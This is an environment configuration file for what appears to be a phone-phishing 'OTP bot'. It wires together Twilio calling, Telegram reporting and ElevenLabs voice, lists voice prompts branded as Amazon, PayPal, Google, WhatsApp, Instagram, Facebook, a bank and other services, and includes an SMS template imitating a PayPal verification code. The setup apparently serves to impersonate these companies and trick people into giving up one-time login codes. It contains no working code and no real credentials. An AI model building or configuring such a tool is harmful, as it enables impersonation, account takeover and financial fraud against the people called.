# General Setup
SETUP_DONE=true

# Twilio Configuration
TWILIO_ACCOUNT_SID=
TWILIO_AUTH_TOKEN=
TWILIO_CALLER_ID=+

# API Configuration
API_PASSWORD=yourapipassword
SERVER_URL=https://example.com

# Telegram Bot Configuration
TELEGRAM_CHAT_ID=
TELEGRAM_BOT_TOKEN=

# Eleven Labs API Configuration
ELEVEN_LABS_API_KEY=
ELEVEN_LABS_VOICE_ID=EXAVITQu4vr4xnSDxMaL

# File Paths
AMAZON_FILE_PATH=./voice/en/amazon/ask-amazon.mp3
CDISCOUNT_FILE_PATH=./voice/en/cdiscount/ask-cdiscount.mp3
TWITTER_FILE_PATH=./voice/en/twitter/ask-twitter.mp3
WHATSAPP_FILE_PATH=./voice/en/whatsapp/ask-whatsapp.mp3
PAYPAL_FILE_PATH=./voice/en/paypal/ask-paypal.mp3
GOOGLE_FILE_PATH=./voice/en/google/ask-google.mp3
SNAPCHAT_FILE_PATH=./voice/en/snapchat/ask-snapchat.mp3
INSTAGRAM_FILE_PATH=./voice/en/instagram/ask-instagram.mp3
FACEBOOK_FILE_PATH=./voice/en/facebook/ask-facebook.mp3
END_FILE_PATH=./voice/en/done/ask-done.mp3
DEFAULT_FILE_PATH=./voice/en/default/ask-default.mp3
BANQUE_FILE_PATH=./voice/en/banque/ask-banque.mp3

# SMS Content
PAYPAL_SMS=Your PayPal verification code is: {code}
